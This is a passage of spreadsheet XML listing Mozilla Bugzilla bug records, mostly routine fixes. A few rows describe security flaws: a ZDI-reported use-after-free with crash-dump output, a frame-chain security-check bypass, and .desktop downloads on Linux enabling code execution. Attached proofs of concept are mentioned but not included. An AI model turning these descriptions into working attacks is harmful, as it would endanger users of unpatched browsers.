      <c r="B6098" t="inlineStr">
        <is>
          <t>2008-10-27 15:28:35 -0700</t>
        </is>
      </c>
      <c r="C6098" t="inlineStr">
        <is>
          <t>Set aside the frame chain when firing synchronous events</t>
        </is>
      </c>
      <c r="D6098" t="inlineStr">
        <is>
          <t>2010-03-11 13:47:07 -0800</t>
        </is>
      </c>
      <c r="E6098" t="n">
        <v>1</v>
      </c>
      <c r="F6098" t="n">
        <v>1</v>
      </c>
      <c r="G6098" t="n">
        <v>3</v>
      </c>
      <c r="H6098" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I6098" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J6098" t="inlineStr">
        <is>
          <t>XPConnect</t>
        </is>
      </c>
      <c r="K6098" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L6098" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M6098" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N6098" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O6098" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P6098" t="inlineStr">
        <is>
          <t>[sg:critical][needs 1.8 patch diff before review]</t>
        </is>
      </c>
      <c r="Q6098" t="inlineStr">
        <is>
          <t>P2</t>
        </is>
      </c>
      <c r="R6098" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S6098" t="inlineStr">
        <is>
          <t>mozilla1.9.1</t>
        </is>
      </c>
      <c r="T6098" t="n">
        <v>1</v>
      </c>
      <c r="U6098" t="n">
        <v>0</v>
      </c>
      <c r="V6098" t="n">
        <v>52</v>
      </c>
      <c r="W6098" t="inlineStr">
        <is>
          <t>This is a spin-off of bug 461743 comment 0. When we fire synchronous events, we don't set aside the frame chain, so security checks will find any chrome code running as a result of setTimeout, even if the code is properly using XPC*Wrappers.
It seems to me that we should always set aside the frame pointer when pushing a context onto the context stack.</t>
        </is>
      </c>
      <c r="X6098" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="6099">
      <c r="A6099" t="n">
        <v>365709</v>
      </c>
      <c r="B6099" t="inlineStr">
        <is>
          <t>2007-01-02 14:39:38 -0800</t>
        </is>
      </c>
      <c r="C6099" t="inlineStr">
        <is>
          <t>Add link to comment in bugmail notification</t>
        </is>
      </c>
      <c r="D6099" t="inlineStr">
        <is>
          <t>2011-12-09 03:43:12 -0800</t>
        </is>
      </c>
      <c r="E6099" t="n">
        <v>1</v>
      </c>
      <c r="F6099" t="n">
        <v>1</v>
      </c>
      <c r="G6099" t="n">
        <v>4</v>
      </c>
      <c r="H6099" t="inlineStr">
        <is>
          <t>Server Software</t>
        </is>
      </c>
      <c r="I6099" t="inlineStr">
        <is>
          <t>Bugzilla</t>
        </is>
      </c>
      <c r="J6099" t="inlineStr">
        <is>
          <t>Email Notifications</t>
        </is>
      </c>
      <c r="K6099" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L6099" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M6099" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N6099" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O6099" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P6099" t="inlineStr">
        <is>
          <t>[wanted-bmo]</t>
        </is>
      </c>
      <c r="Q6099" t="inlineStr">
        <is>
          <t>P2</t>
        </is>
      </c>
      <c r="R6099" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S6099" t="inlineStr">
        <is>
          <t>Bugzilla 4.4</t>
        </is>
      </c>
      <c r="T6099" t="n">
        <v>1</v>
      </c>
      <c r="U6099" t="n">
        <v>2</v>
      </c>
      <c r="V6099" t="n">
        <v>10</v>
      </c>
      <c r="W6099" t="inlineStr">
        <is>
          <t>Receiving bugmail with a new comment makes it hard to find the entry for long bug conversations.
We should have a link to the comment in the bugmail so you can directly jump to the entry e.g. https://bugzilla.mozilla.org/show_bug.cgi?id=363831#c35</t>
        </is>
      </c>
      <c r="X6099" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="6100">
      <c r="A6100" t="n">
        <v>1163659</v>
      </c>
      <c r="B6100" t="inlineStr">
        <is>
          <t>2015-05-11 09:20:00 -0700</t>
        </is>
      </c>
      <c r="C6100" t="inlineStr">
        <is>
          <t>Rescue/clean up jobs that are stuck in the loading state in the objectstore</t>
        </is>
      </c>
      <c r="D6100" t="inlineStr">
        <is>
          <t>2015-06-30 14:50:54 -0700</t>
        </is>
      </c>
      <c r="E6100" t="n">
        <v>1</v>
      </c>
      <c r="F6100" t="n">
        <v>1</v>
      </c>
      <c r="G6100" t="n">
        <v>7</v>
      </c>
      <c r="H6100" t="inlineStr">
        <is>
          <t>Developer Infrastructure</t>
        </is>
      </c>
      <c r="I6100" t="inlineStr">
        <is>
          <t>Tree Management</t>
        </is>
      </c>
      <c r="J6100" t="inlineStr">
        <is>
          <t>Treeherder: Infrastructure</t>
        </is>
      </c>
      <c r="K6100" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="L6100" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M6100" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N6100" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O6100" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P6100" t="inlineStr"/>
      <c r="Q6100" t="inlineStr">
        <is>
          <t>P3</t>
        </is>
      </c>
      <c r="R6100" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S6100" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T6100" t="n">
        <v>1</v>
      </c>
      <c r="U6100" t="n">
        <v>0</v>
      </c>
      <c r="V6100" t="n">
        <v>9</v>
      </c>
      <c r="W6100" t="inlineStr">
        <is>
          <t>Due to bug 1125476, if a worker is killed/dies/hits an exception, the rows in the objectstore that it claimed for processing, get stuck in the 'loading' state.
Until recently (bug 1162682) for exceptions this would include _all_ of the jobs in the batch of up to 100.
Lets rescue jobs in the last couple of months on try, and delete any others.</t>
        </is>
      </c>
      <c r="X6100" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="6101">
      <c r="A6101" t="n">
        <v>282090</v>
      </c>
      <c r="B6101" t="inlineStr">
        <is>
          <t>2005-02-12 19:22:38 -0800</t>
        </is>
      </c>
      <c r="C6101" t="inlineStr">
        <is>
          <t>Eliminate %classdesc in favor of Bugzilla::Classification methods</t>
        </is>
      </c>
      <c r="D6101" t="inlineStr">
        <is>
          <t>2005-10-11 15:13:26 -0700</t>
        </is>
      </c>
      <c r="E6101" t="n">
        <v>1</v>
      </c>
      <c r="F6101" t="n">
        <v>1</v>
      </c>
      <c r="G6101" t="n">
        <v>4</v>
      </c>
      <c r="H6101" t="inlineStr">
        <is>
          <t>Server Software</t>
        </is>
      </c>
      <c r="I6101" t="inlineStr">
        <is>
          <t>Bugzilla</t>
        </is>
      </c>
      <c r="J6101" t="inlineStr">
        <is>
          <t>Bugzilla-General</t>
        </is>
      </c>
      <c r="K6101" t="inlineStr">
        <is>
          <t>2.19.2</t>
        </is>
      </c>
      <c r="L6101" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M6101" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N6101" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O6101" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P6101" t="inlineStr"/>
      <c r="Q6101" t="inlineStr">
        <is>
          <t>P2</t>
        </is>
      </c>
      <c r="R6101" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S6101" t="inlineStr">
        <is>
          <t>Bugzilla 2.22</t>
        </is>
      </c>
      <c r="T6101" t="n">
        <v>1</v>
      </c>
      <c r="U6101" t="n">
        <v>0</v>
      </c>
      <c r="V6101" t="n">
        <v>9</v>
      </c>
      <c r="W6101" t="inlineStr">
        <is>
          <t>Instead of being a global variable, %classifications should come out of a
subroutine in Bugzilla::Classification (which is a new module).</t>
        </is>
      </c>
      <c r="X6101" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="6102">
      <c r="A6102" t="n">
        <v>888241</v>
      </c>
      <c r="B6102" t="inlineStr">
        <is>
          <t>2013-06-28 05:43:56 -0700</t>
        </is>
      </c>
      <c r="C6102" t="inlineStr">
        <is>
          <t>[B2G][Leo][SMS] Long tapping on a valid phone number or email, included in a SMS thread, if it overlaps an option of the dialog menu, it opens it directly</t>
        </is>
      </c>
      <c r="D6102" t="inlineStr">
        <is>
          <t>2013-07-23 13:39:47 -0700</t>
        </is>
      </c>
      <c r="E6102" t="n">
        <v>1</v>
      </c>
      <c r="F6102" t="n">
        <v>1</v>
      </c>
      <c r="G6102" t="n">
        <v>6</v>
      </c>
      <c r="H6102" t="inlineStr">
        <is>
          <t>Graveyard</t>
        </is>
      </c>
      <c r="I6102" t="inlineStr">
        <is>
          <t>Firefox OS Graveyard</t>
        </is>
      </c>
      <c r="J6102" t="inlineStr">
        <is>
          <t>Gaia::SMS</t>
        </is>
      </c>
      <c r="K6102" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L6102" t="inlineStr">
        <is>
          <t>ARM</t>
        </is>
      </c>
      <c r="M6102" t="inlineStr">
        <is>
          <t>Gonk (Firefox OS)</t>
        </is>
      </c>
      <c r="N6102" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O6102" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P6102" t="inlineStr">
        <is>
          <t xml:space="preserve">leorun4, [u=commsapps-user c=messaging p=1],[LeoVB+] </t>
        </is>
      </c>
      <c r="Q6102" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R6102" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S6102" t="inlineStr">
        <is>
          <t>1.1 QE4 (15jul)</t>
        </is>
      </c>
      <c r="T6102" t="n">
        <v>1</v>
      </c>
      <c r="U6102" t="n">
        <v>0</v>
      </c>
      <c r="V6102" t="n">
        <v>27</v>
      </c>
      <c r="W6102" t="inlineStr">
        <is>
          <t>This issue tested on Leo 1.1 (Test Run Firefox OS 1.1.0 Full – Leo Run 4)
BUILD:
Gecko a378807ff04076c20f08b0102286b9eb2d08d60a
Gaia 1436e2778b90bd74635b0b94d1cf8ccb0d71b60c
Platform Version: 18.1
STEPS
1.Send a SMS from another device to the DUT containing a valid email address and/or a valid phone number
2.Open the SMS app on the DUT.
3.Long press on the email address or in the phone number contained in the SMS.
EXPECTED RESULT
A dialog menu screen is shown with the email address or phone number selected in the header, and three options in the low area of the screen( "Create new contact", "Add to an existing contact", "Cancel")
ACTUAL RESULT
If the phone number or email address in the SMS thread, matches with the place of one of the options of the dialog menu, the option is opened directly, and it doesn't stop in the dialog menu screen.
Link to failed test case: 
https://moztrap.mozilla.org/manage/case/7192/</t>
        </is>
      </c>
      <c r="X6102" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="6103">
      <c r="A6103" t="n">
        <v>305451</v>
      </c>
      <c r="B6103" t="inlineStr">
        <is>
          <t>2005-08-21 16:51:17 -0700</t>
        </is>
      </c>
      <c r="C6103" t="inlineStr">
        <is>
          <t>GetGroupsByUserId() in buglist.cgi returns bad data</t>
        </is>
      </c>
      <c r="D6103" t="inlineStr">
        <is>
          <t>2005-08-22 13:49:24 -0700</t>
        </is>
      </c>
      <c r="E6103" t="n">
        <v>1</v>
      </c>
      <c r="F6103" t="n">
        <v>1</v>
      </c>
      <c r="G6103" t="n">
        <v>4</v>
      </c>
      <c r="H6103" t="inlineStr">
        <is>
          <t>Server Software</t>
        </is>
      </c>
      <c r="I6103" t="inlineStr">
        <is>
          <t>Bugzilla</t>
        </is>
      </c>
      <c r="J6103" t="inlineStr">
        <is>
          <t>Creating/Changing Bugs</t>
        </is>
      </c>
      <c r="K6103" t="inlineStr">
        <is>
          <t>2.21</t>
        </is>
      </c>
      <c r="L6103" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M6103" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N6103" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O6103" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P6103" t="inlineStr"/>
      <c r="Q6103" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R6103" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S6103" t="inlineStr">
        <is>
          <t>Bugzilla 2.22</t>
        </is>
      </c>
      <c r="T6103" t="n">
        <v>1</v>
      </c>
      <c r="U6103" t="n">
        <v>0</v>
      </c>
      <c r="V6103" t="n">
        <v>11</v>
      </c>
      <c r="W6103" t="inlineStr">
        <is>
          <t>Due to the checkin of bug 304583, I cannot see groups anymore when editing
several bugs at once. I think the problem comes from GetGroupsByUserId() in
buglist.cgi which has not been updated. I tried the following change:
Before my hack:
    my $groups = $dbh-&gt;selectall_arrayref(
       "SELECT DISTINCT  groups.id, name, description, isactive
                   FROM  groups
             INNER JOIN  user_group_map
                     ON  user_group_map.group_id = groups.id
                  WHERE  user_id = ?
                    AND  isbless = 0
                    AND  isbuggroup = 1
               ORDER BY  description "
               , {Slice =&gt; {}}, ($userid));
After my hack:
    my $grouplist = Bugzilla-&gt;user-&gt;groups_as_string;
    my $groups = $dbh-&gt;selectall_arrayref(
       "SELECT DISTINCT  id, name, description, isactive
                   FROM  groups
                  WHERE  id IN ($grouplist)
                    AND  isbuggroup = 1
               ORDER BY  description "
               , {Slice =&gt; {}});
Now, groups are displayed, but the wrong groups are shown. I have no idea if the
problem is specific to my hack or if there is something more serious about User.pm.</t>
        </is>
      </c>
      <c r="X6103" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="6104">
      <c r="A6104" t="n">
        <v>1068218</v>
      </c>
      <c r="B6104" t="inlineStr">
        <is>
          <t>2014-09-16 12:47:11 -0700</t>
        </is>
      </c>
      <c r="C6104" t="inlineStr">
        <is>
          <t>DirectionalityUtils Use-After-Free, crash [@ mozilla::dom::Element::UpdateState(bool) ] (ZDI-CAN-2531)</t>
        </is>
      </c>
      <c r="D6104" t="inlineStr">
        <is>
          <t>2019-03-13 06:42:05 -0700</t>
        </is>
      </c>
      <c r="E6104" t="n">
        <v>1</v>
      </c>
      <c r="F6104" t="n">
        <v>1</v>
      </c>
      <c r="G6104" t="n">
        <v>3</v>
      </c>
      <c r="H6104" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I6104" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J6104" t="inlineStr">
        <is>
          <t>DOM: Core &amp; HTML</t>
        </is>
      </c>
      <c r="K6104" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L6104" t="inlineStr">
        <is>
          <t>x86_64</t>
        </is>
      </c>
      <c r="M6104" t="inlineStr">
        <is>
          <t>Windows 7</t>
        </is>
      </c>
      <c r="N6104" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O6104" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P6104" t="inlineStr">
        <is>
          <t>[adv-main33+][adv-esr31.2+]</t>
        </is>
      </c>
      <c r="Q6104" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R6104" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S6104" t="inlineStr">
        <is>
          <t>mozilla35</t>
        </is>
      </c>
      <c r="T6104" t="n">
        <v>1</v>
      </c>
      <c r="U6104" t="n">
        <v>0</v>
      </c>
      <c r="V6104" t="n">
        <v>18</v>
      </c>
      <c r="W6104" t="inlineStr">
        <is>
          <t>Created attachment 8490287
POC (will crash affected versions)
ZDI reported the following to the security@ alias:
ZDI-CAN-2531: Mozilla Firefox DirectionalityUtils Use-After-Free Remote Code Execution Vulnerability
-- CVSS -----------------------------------------
6.8, AV:N/AC:M/Au:N/C:P/I:P/A:P
-- ABSTRACT -------------------------------------
HP's Zero Day Initiative has identified a vulnerability affecting the following products:
  Mozilla Firefox
-- VULNERABILITY DETAILS ------------------------
Verified against Firefox 32.0 Stable on Windows 8.1 as well as the nightly build 35.0 a1.  Note that this might require a couple of tries to trigger properly.
Debug info against the night build:
```
(df8.a2c): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=5a5a5a5a ebx=0f223c80 ecx=0f9c1560 edx=0f9c1560 esi=0f9c1560 edi=00000002
eip=60536caf esp=00eee09c ebp=00eee0bc iopl=0         nv up ei pl nz na po nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00210202
xul!mozilla::dom::Element::UpdateState+0xf:
60536caf 8b80a8010000    mov     eax,dword ptr [eax+1A8h] ds:0023:5a5a5c02=????????
[... Rest of stack deleted, can be retrieved if needed --dveditz]
-- CREDIT ---------------------------------------
This vulnerability was discovered by:
   regenrecht working with HP's Zero Day Initiative</t>
        </is>
      </c>
      <c r="X6104" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="6105">
      <c r="A6105" t="n">
        <v>1397401</v>
      </c>
      <c r="B6105" t="inlineStr">
        <is>
          <t>2017-09-06 12:05:40 -0700</t>
        </is>
      </c>
      <c r="C6105" t="inlineStr">
        <is>
          <t>[macOS] [Photon] Regression: Window Traffic Lights are no longer vertically centered</t>
        </is>
      </c>
      <c r="D6105" t="inlineStr">
        <is>
          <t>2017-10-16 05:20:37 -0700</t>
        </is>
      </c>
      <c r="E6105" t="n">
        <v>1</v>
      </c>
      <c r="F6105" t="n">
        <v>1</v>
      </c>
      <c r="G6105" t="n">
        <v>2</v>
      </c>
      <c r="H6105" t="inlineStr">
        <is>
          <t>Client Software</t>
        </is>
      </c>
      <c r="I6105" t="inlineStr">
        <is>
          <t>Firefox</t>
        </is>
      </c>
      <c r="J6105" t="inlineStr">
        <is>
          <t>Theme</t>
        </is>
      </c>
      <c r="K6105" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L6105" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M6105" t="inlineStr">
        <is>
          <t>macOS</t>
        </is>
      </c>
      <c r="N6105" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O6105" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P6105" t="inlineStr">
        <is>
          <t>[reserve-photon-visual][fixed by bug 1349552]</t>
        </is>
      </c>
      <c r="Q6105" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R6105" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S6105" t="inlineStr">
        <is>
          <t>Firefox 57</t>
        </is>
      </c>
      <c r="T6105" t="n">
        <v>1</v>
      </c>
      <c r="U6105" t="n">
        <v>0</v>
      </c>
      <c r="V6105" t="n">
        <v>13</v>
      </c>
      <c r="W6105" t="inlineStr">
        <is>
          <t>Created attachment 8905196
actual_vs_expected.png
User Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3207.0 Safari/537.36
Steps to reproduce:
57.0a1 (2017-09-06) (64-Bit)
macOS 10.12.6
1.) Take a look at the Window Traffic Lights
Actual results:
They should be vertically aligned.
Expected results:
They are not aligned.
This is a regression. It is aligned in Firefox Stable (Non-Photon-UI).
A screenshot attached.</t>
        </is>
      </c>
      <c r="X6105" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="6106">
      <c r="A6106" t="n">
        <v>685656</v>
      </c>
      <c r="B6106" t="inlineStr">
        <is>
          <t>2011-09-08 13:08:31 -0700</t>
        </is>
      </c>
      <c r="C6106" t="inlineStr">
        <is>
          <t>Use production-masters.json as the default for setup-masters.py</t>
        </is>
      </c>
      <c r="D6106" t="inlineStr">
        <is>
          <t>2013-08-12 21:54:08 -0700</t>
        </is>
      </c>
      <c r="E6106" t="n">
        <v>1</v>
      </c>
      <c r="F6106" t="n">
        <v>1</v>
      </c>
      <c r="G6106" t="n">
        <v>5</v>
      </c>
      <c r="H6106" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="I6106" t="inlineStr">
        <is>
          <t>Release Engineering</t>
        </is>
      </c>
      <c r="J6106" t="inlineStr">
        <is>
          <t>General</t>
        </is>
      </c>
      <c r="K6106" t="inlineStr">
        <is>
          <t>other</t>
        </is>
      </c>
      <c r="L6106" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M6106" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N6106" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O6106" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P6106" t="inlineStr"/>
      <c r="Q6106" t="inlineStr">
        <is>
          <t>P3</t>
        </is>
      </c>
      <c r="R6106" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S6106" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T6106" t="n">
        <v>1</v>
      </c>
      <c r="U6106" t="n">
        <v>0</v>
      </c>
      <c r="V6106" t="n">
        <v>3</v>
      </c>
      <c r="W6106" t="inlineStr">
        <is>
          <t>Created attachment 559257
modify setup_masters.py to load the production-masters.json file rather than the masters_08 list
I was trying to setup the bm16-tests1-windows master and I realized that it wasn't on the list of ./setup_masters.py.
Then I figured out that an out of date list of masters was being use (masters_08) instead of the up to date list that the json files provides.
I have not being able to find any other file besides Makefile.setup that a default setting change would be affected.
From looking at preproduction [1] I don't see bm16-tests1-windows and other recent masters being tested.
[1] http://preproduction-master.build.mozilla.org:8710/builders/test-masters/builds/2630/steps/test_masters/logs/stdio</t>
        </is>
      </c>
      <c r="X6106" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="6107">
      <c r="A6107" t="n">
        <v>1810191</v>
      </c>
      <c r="B6107" t="inlineStr">
        <is>
          <t>2023-01-13 09:04:46 -0800</t>
        </is>
      </c>
      <c r="C6107" t="inlineStr">
        <is>
          <t>.desktop file extension on Linux should be rewritten to .desktop.download to avoid users running local executables _if_ desktop files are executed by the user's file manager.</t>
        </is>
      </c>
      <c r="D6107" t="inlineStr">
        <is>
          <t>2024-05-30 11:03:56 -0700</t>
        </is>
      </c>
      <c r="E6107" t="n">
        <v>1</v>
      </c>
      <c r="F6107" t="n">
        <v>1</v>
      </c>
      <c r="G6107" t="n">
        <v>2</v>
      </c>
      <c r="H6107" t="inlineStr">
        <is>
          <t>Client Software</t>
        </is>
      </c>
      <c r="I6107" t="inlineStr">
        <is>
          <t>Firefox</t>
        </is>
      </c>
      <c r="J6107" t="inlineStr">
        <is>
          <t>File Handling</t>
        </is>
      </c>
      <c r="K6107" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L6107" t="inlineStr">
        <is>
          <t>Desktop</t>
        </is>
      </c>
      <c r="M6107" t="inlineStr">
        <is>
          <t>Linux</t>
        </is>
      </c>
      <c r="N6107" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O6107" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P6107" t="inlineStr">
        <is>
          <t>[reporter-external] [client-bounty-form] [verif?][post-critsmash-triage][adv-main112+][adv-esr102.10+]</t>
        </is>
      </c>
      <c r="Q6107" t="inlineStr">
        <is>
          <t>P3</t>
        </is>
      </c>
      <c r="R6107" t="inlineStr">
        <is>
          <t>S3</t>
        </is>
      </c>
      <c r="S6107" t="inlineStr">
        <is>
          <t>113 Branch</t>
        </is>
      </c>
      <c r="T6107" t="n">
        <v>1</v>
      </c>
      <c r="U6107" t="n">
        <v>0</v>
      </c>
      <c r="V6107" t="n">
        <v>37</v>
      </c>
      <c r="W6107" t="inlineStr">
        <is>
          <t>Created attachment 9312210
desktopDangerousExtension-Linux.html
Hi Team before starting this have a Look into the below issue description. in which it shows the shortcuts files are restricted and Changed to .download But the same for Linux are not prevented
https://bugs.chromium.org/p/chromium/issues/detail?id=1307930
https://bugs.chromium.org/p/chromium/issues/detail?id=1140417
.desktop is a Shortcut file in linux similar to .lnk in Windows which could have ability to invoke the executables
Tested in Latest Version of FireFox in Linux 5.7.0-kali1-amd64 (KERNEL)
REPRODUCTION CASE
1. Open the below attached html File in Firefox on linux
2. You can see the shortcut file is allowed and downloaded in linux without renaming
Impact: Lead to Executing Code 
I have added a POC HTML The resultant download file will invoke Calc when it is trying to execute</t>
        </is>
      </c>
      <c r="X6107" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="6108">
      <c r="A6108" t="n">
        <v>950858</v>
      </c>
      <c r="B6108" t="inlineStr">
        <is>
          <t>2013-12-16 12:29:41 -0800</t>
        </is>
      </c>
      <c r="C6108" t="inlineStr">
        <is>
          <t>MOZ_CRASH("impossible cipher suite") hit in Firefox 26 release</t>
        </is>
      </c>
      <c r="D6108" t="inlineStr">
        <is>
          <t>2014-02-07 10:31:46 -0800</t>
        </is>
      </c>
      <c r="E6108" t="n">
        <v>1</v>
      </c>
      <c r="F6108" t="n">
        <v>1</v>
      </c>
      <c r="G6108" t="n">
        <v>3</v>
      </c>
      <c r="H6108" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I6108" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J6108" t="inlineStr">
        <is>
          <t>Security: PSM</t>
        </is>
      </c>
      <c r="K6108" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L6108" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M6108" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N6108" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O6108" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P6108" t="inlineStr">
        <is>
          <t>[qa-]</t>
        </is>
      </c>
      <c r="Q6108" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R6108" t="inlineStr">
        <is>
          <t>major</t>
        </is>
      </c>
      <c r="S6108" t="inlineStr">
        <is>
          <t>mozilla29</t>
        </is>
      </c>
      <c r="T6108" t="n">
        <v>1</v>
      </c>
      <c r="U6108" t="n">
        <v>0</v>
      </c>
      <c r="V6108" t="n">
        <v>22</v>
      </c>
      <c r="W6108" t="inlineStr">
        <is>
          <t>See:
http://hg.mozilla.org/releases/mozilla-release/annotate/39faf812aaec/security/manager/ssl/src/nsNSSCallbacks.cpp#l1106
http://forums.mozillazine.org/viewtopic.php?f=9&amp;t=2783195
http://forums.mozillazine.org/viewtopic.php?f=9&amp;t=2783195
This patch got uplifted to Firefox 26. The patch only accounts for the cipher suites that are enabled in Firefox 27 and later. However, this is a different set of cipher suites than is enabled in Firefox 26.
Also, MOZ_CRASH is too extreme. MOZ_ASSERT is better for this type of thing.</t>
        </is>
      </c>
      <c r="X6108" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="6109">
      <c r="A6109" t="n">
        <v>868930</v>
      </c>
      <c r="B6109" t="inlineStr">
        <is>
          <t>2013-05-06 01:33:13 -0700</t>
        </is>
      </c>
      <c r="C6109" t="inlineStr">
        <is>
          <t>Relative paths in manifest should be relative to manifest file</t>
        </is>
      </c>
      <c r="D6109" t="inlineStr">
        <is>
          <t>2013-06-05 15:39:59 -0700</t>
        </is>
      </c>
      <c r="E6109" t="n">
        <v>1</v>
      </c>
      <c r="F6109" t="n">
        <v>1</v>
      </c>
      <c r="G6109" t="n">
        <v>5</v>
      </c>
      <c r="H6109" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="I6109" t="inlineStr">
        <is>
          <t>L20n</t>
        </is>
      </c>
      <c r="J6109" t="inlineStr">
        <is>
          <t>HTML Bindings</t>
        </is>
      </c>
      <c r="K6109" t="inlineStr">
        <is>
          <t>0.x</t>
        </is>
      </c>
      <c r="L6109" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M6109" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N6109" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O6109" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P6109" t="inlineStr"/>
      <c r="Q6109" t="inlineStr">
        <is>
          <t>P2</t>
        </is>
      </c>
      <c r="R6109" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S6109" t="inlineStr">
        <is>
          <t>1.0</t>
        </is>
      </c>
      <c r="T6109" t="n">
        <v>1</v>
      </c>
      <c r="U6109" t="n">
        <v>0</v>
      </c>
      <c r="V6109" t="n">
        <v>6</v>
      </c>
      <c r="W6109" t="inlineStr">
        <is>
          <t>User Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.8; rv:20.0) Gecko/20100101 Firefox/20.0
Build ID: 20130326150557
